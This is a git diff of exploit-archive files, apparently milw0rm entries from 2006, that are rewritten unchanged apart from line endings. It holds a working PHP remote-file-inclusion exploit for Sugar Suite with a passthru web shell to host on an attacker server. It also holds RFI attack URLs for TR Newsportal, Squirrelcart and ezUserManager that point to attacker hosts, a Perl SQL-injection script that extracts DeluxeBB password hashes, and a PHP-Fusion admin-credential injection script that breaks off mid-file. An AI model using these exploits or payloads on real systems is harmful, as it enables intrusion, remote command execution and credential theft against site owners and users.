-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-$host=$argv[1];
-$path=$argv[2];
-$loc=urlencode($argv[3]);
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{
-$cmd.=" ".$argv[$i];
-}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."modules/OptimisticLock/LockResolve.php HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
-$packet.="Host: ".$host."\r\n";
-//through cookies, it's the same, maybe can bypass some ids...
-$packet.="Cookie: GLOBALS[sugarEntry]=1; _SESSION[o_lock_object]=1; _SESSION[o_lock_module]=1; beanList[1]=1; beanFiles[1]=".$loc."; cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"*delim*"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("*delim*",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-else
-{
- if (strstr($html,"Not A Valid Entry Point")) {echo "register_globals off here...\r\n";}
- echo "Exploit failed...";
-}
-?>
-
-# milw0rm.com [2006-05-14]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Sugar Suite Open Source <= 4.2 \"OptimisticLock!\" arbitrary remote inclusion exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to sugar suite\r\n";
+echo "location:  an arbitrary location with the code to include\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n";
+echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n";
+echo "note, you need this code in http://somehost.com/shell.txt\r\n";
+echo "<?php\r\n";
+echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
+echo "ini_set(\"max_execution_time\",0);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "?>\r\n";
+die;
+}
+
+/* software site: http://www.sugarcrm.com/crm/
+
+   i) vulnerable code in modules/OptimisticLock/LockResolve.php:
+
+   ...
+   if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //<--- the f@ke protection, nearly in all files
+   ...
+   if(isset($_SESSION['o_lock_object'])){
+	global $beanFiles, $moduleList;
+	$object = 	$_SESSION['o_lock_object'];
+	require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]);
+	$current_state = new $_SESSION['o_lock_class']();
+	$current_state->retrieve($object['id']);
+
+	if(isset($_REQUEST['save'])){
+		$_SESSION['o_lock_fs'] = true;
+		echo  $_SESSION['o_lock_save'];
+		die();
+	}else{
+		display_conflict_between_objects($object, $current_state->toArray(),$current_state->field_defs, $current_state->module_dir, $_SESSION['o_lock_class']);
+}}else{
+	echo 'No Locked Objects';
+}
+...
+
+you can include files from local & remote resources and launch commands, poc:
+
+with register_globals = On & allow_url_fopen = On:
+http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://somehost.com/someshell.txt
+with register_globals = On:
+http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=../../../../../../../../etc/passwd
+
+ii) arbitrary local inclusion issues in a lot of files:
+
+with register_globals = On & magic_quotes_gpc = Off:
+http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+
+with register_globals=On:
+http://[target]/[path]/modules/Administration/RebuildAudit.php?GLOBALS[sugarEntry]=1&beanFiles[1]=../../../../../../../../../../../../../etc/passwd
+
+and (on PHP5) arbitrary remote inclusion, including a file from a ftp resource:
+
+http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@somehost.com/shell.txt
+
+this is the exploit tool for i)
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+$host=$argv[1];
+$path=$argv[2];
+$loc=urlencode($argv[3]);
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{
+$cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."modules/OptimisticLock/LockResolve.php HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
+$packet.="Host: ".$host."\r\n";
+//through cookies, it's the same, maybe can bypass some ids...
+$packet.="Cookie: GLOBALS[sugarEntry]=1; _SESSION[o_lock_object]=1; _SESSION[o_lock_module]=1; beanList[1]=1; beanFiles[1]=".$loc."; cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"*delim*"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("*delim*",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+else
+{
+ if (strstr($html,"Not A Valid Entry Point")) {echo "register_globals off here...\r\n";}
+ echo "Exploit failed...";
+}
+?>
+
+# milw0rm.com [2006-05-14]
diff --git a/platforms/php/webapps/1789.txt b/platforms/php/webapps/1789.txt
index 8e7cd48d5..6f77f265e 100755
--- a/platforms/php/webapps/1789.txt
+++ b/platforms/php/webapps/1789.txt
@@ -1,28 +1,28 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#TR Newsportal - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#dork: "TR Newsportal" brought by TRanx.
-##################################################################
-extras/poll/poll.php:
-[code]
-<?
-include("$file_newsportal");
-$ns=OpenNNTPconnection($server,$port);
-flush();
-if ($ns != false) {
- $headers = readOverview($ns,$group,1,true);
- closeNNTPconnection($ns);
-}
-?>
-[/code]
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts]
-
-
-###################################################################
-#Elo ;-)
-
-# milw0rm.com [2006-05-15]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#TR Newsportal - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#dork: "TR Newsportal" brought by TRanx.
+##################################################################
+extras/poll/poll.php:
+[code]
+<?
+include("$file_newsportal");
+$ns=OpenNNTPconnection($server,$port);
+flush();
+if ($ns != false) {
+ $headers = readOverview($ns,$group,1,true);
+ closeNNTPconnection($ns);
+}
+?>
+[/code]
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts]
+
+
+###################################################################
+#Elo ;-)
+
+# milw0rm.com [2006-05-15]
diff --git a/platforms/php/webapps/1790.txt b/platforms/php/webapps/1790.txt
index c62112e65..723a4ecde 100755
--- a/platforms/php/webapps/1790.txt
+++ b/platforms/php/webapps/1790.txt
@@ -1,9 +1,9 @@
-Title         : Squirrelcart <= 2.2.0 Remote File Inclusion
-URL           : http://www.ldev.com/
-google Dork   : inurl:/squirrelcart/
-Author        : OLiBekaS
-greetz        : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
-Exploit       : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-05-15]
+Title         : Squirrelcart <= 2.2.0 Remote File Inclusion
+URL           : http://www.ldev.com/
+google Dork   : inurl:/squirrelcart/
+Author        : OLiBekaS
+greetz        : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
+
+Exploit       : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-05-15]
diff --git a/platforms/php/webapps/1793.pl b/platforms/php/webapps/1793.pl
index 5bc850b72..a822f856b 100755
--- a/platforms/php/webapps/1793.pl
+++ b/platforms/php/webapps/1793.pl
@@ -1,79 +1,79 @@
-#!/usr/bin/perl
-
-use IO::Socket;
-
-
-print q{
-#############################################
-# DeluxeBB 1.06 Remote SQL Injection Exploit#
-# 	exploit discovered and coded        #
-#	   by KingOfSka                     #
-#	http://contropotere.netsons.org	    #
-#############################################
-};
-
-if (!$ARGV[2]) {
-
-print q{ 
-	Usage: perl dbbxpl.pl host /directory/ victim_userid 
-  
-       perl dbbxpl.pl www.somesite.com /forum/ 1
-
-
-};
-
-}
-
-
-$server = $ARGV[0];
-$dir    = $ARGV[1];
-$user   = $ARGV[2];
-$myuser = $ARGV[3];
-$mypass = $ARGV[4];
-$myid   = $ARGV[5];
-
-print "------------------------------------------------------------------------------------------------\r\n";
-print "[>] SERVER: $server\r\n";
-print "[>]    DIR: $dir\r\n";
-print "[>] USERID: $user\r\n";
-print "------------------------------------------------------------------------------------------------\r\n\r\n";
-
-$server =~ s/(http:\/\/)//eg;
-
-$path  = $dir;
-$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
-
- 
-print "[~] PREPARE TO CONNECT...\r\n";
-
-$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
-
-print "[+] CONNECTED\r\n";
-print "[~] SENDING QUERY...\r\n";
-print $socket "GET $path HTTP/1.1\r\n";
-print $socket "Host: $server\r\n";
-print $socket "Accept: */*\r\n";
-print $socket "Connection: close\r\n\r\n";
-print "[+] DONE!\r\n\r\n";
-
-
-
-print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
-while ($answer = <$socket>)
-{
-
- if ($answer =~/(\w{32})/)
-{
-
-  if ($1 ne 0) {
-   print "Password Hash is: ".$1."\r\n";
-print "--------------------------------------------------------------------------------------\r\n";
-
-      }
-exit();
-}
-
-}
-print "------------------------------------------------------------------------------------------------\r\n";
-
-# milw0rm.com [2006-05-15]
+#!/usr/bin/perl
+
+use IO::Socket;
+
+
+print q{
+#############################################
+# DeluxeBB 1.06 Remote SQL Injection Exploit#
+# 	exploit discovered and coded        #
+#	   by KingOfSka                     #
+#	http://contropotere.netsons.org	    #
+#############################################
+};
+
+if (!$ARGV[2]) {
+
+print q{ 
+	Usage: perl dbbxpl.pl host /directory/ victim_userid 
+  
+       perl dbbxpl.pl www.somesite.com /forum/ 1
+
+
+};
+
+}
+
+
+$server = $ARGV[0];
+$dir    = $ARGV[1];
+$user   = $ARGV[2];
+$myuser = $ARGV[3];
+$mypass = $ARGV[4];
+$myid   = $ARGV[5];
+
+print "------------------------------------------------------------------------------------------------\r\n";
+print "[>] SERVER: $server\r\n";
+print "[>]    DIR: $dir\r\n";
+print "[>] USERID: $user\r\n";
+print "------------------------------------------------------------------------------------------------\r\n\r\n";
+
+$server =~ s/(http:\/\/)//eg;
+
+$path  = $dir;
+$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
+
+ 
+print "[~] PREPARE TO CONNECT...\r\n";
+
+$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
+
+print "[+] CONNECTED\r\n";
+print "[~] SENDING QUERY...\r\n";
+print $socket "GET $path HTTP/1.1\r\n";
+print $socket "Host: $server\r\n";
+print $socket "Accept: */*\r\n";
+print $socket "Connection: close\r\n\r\n";
+print "[+] DONE!\r\n\r\n";
+
+
+
+print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
+while ($answer = <$socket>)
+{
+
+ if ($answer =~/(\w{32})/)
+{
+
+  if ($1 ne 0) {
+   print "Password Hash is: ".$1."\r\n";
+print "--------------------------------------------------------------------------------------\r\n";
+
+      }
+exit();
+}
+
+}
+print "------------------------------------------------------------------------------------------------\r\n";
+
+# milw0rm.com [2006-05-15]
diff --git a/platforms/php/webapps/1795.txt b/platforms/php/webapps/1795.txt
index cc71955b1..d1cf10e4b 100755
--- a/platforms/php/webapps/1795.txt
+++ b/platforms/php/webapps/1795.txt
@@ -1,15 +1,15 @@
-Title       : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
--
-URL         : http://www.ezusermanager.com/
--
-Dork        : "powered by ezUserManager"
--
-Author      : OLiBekaS
--
-contact     : olibekas[at]gmail.com
--
-greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
--
-Exploit     : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls
-
-# milw0rm.com [2006-05-15]
+Title       : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
+-
+URL         : http://www.ezusermanager.com/
+-
+Dork        : "powered by ezUserManager"
+-
+Author      : OLiBekaS
+-
+contact     : olibekas[at]gmail.com
+-
+greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
+-
+Exploit     : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls
+
+# milw0rm.com [2006-05-15]
diff --git a/platforms/php/webapps/1796.php b/platforms/php/webapps/1796.php
index ca0865590..7ad621aa1 100755
--- a/platforms/php/webapps/1796.php
+++ b/platforms/php/webapps/1796.php
@@ -1,152 +1,152 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "PHP-Fusion <= v6.00.306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHP-Fusion\r\n";
-echo "user/pass: you need an account\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Example:\r\n";
-echo "php ".$argv[0]." localhost /fusion/ username password\r\n";
-die;
-}
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$user=$argv[3];
-$pass=$argv[4];
-$port=80;
-$proxy="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "step 1 -> login...\r\n";
-$data ="user_name=".urlencode(trim($user));
-$data.="&user_pass=".urlencode(trim($pass));
-$data.="&login=Login";
-$packet="POST ".$p."news.php HTTP/1.0\r\n";
-$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
-$packet.="Referer: http://".$host.$path."news.php\r\n";
-$packet.="Accept-Language: en\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(' ',$temp[1]);
-$cookie=$temp2[0];
-echo 'Your cookie -> '.$cookie."\r\n\r\n";
-if ($cookie=='') {die("Unable to login...");}
-
-echo "step 2 -> inject some code in srch_where argument...\r\n";
-$sql="999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*";
-$sql=urlencode($sql);
-$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("messages.php?msg_view=",$html);
-$temp2=explode(">",$temp[1]);
-$temp=explode("<",$temp2[1]);
-$admin=$temp[0];
-echo "admin: ".$admin."\r\n";
-
-$sql="999999 UNION SELECT 0,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*";
-$sql=urlencode($sql);
-$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-$temp=explode("messages.php?msg_view=",$html);
-$temp2=explode(">",$temp[1]);
-$temp=explode("<",$temp2[1]);
-$hash=$temp[0];
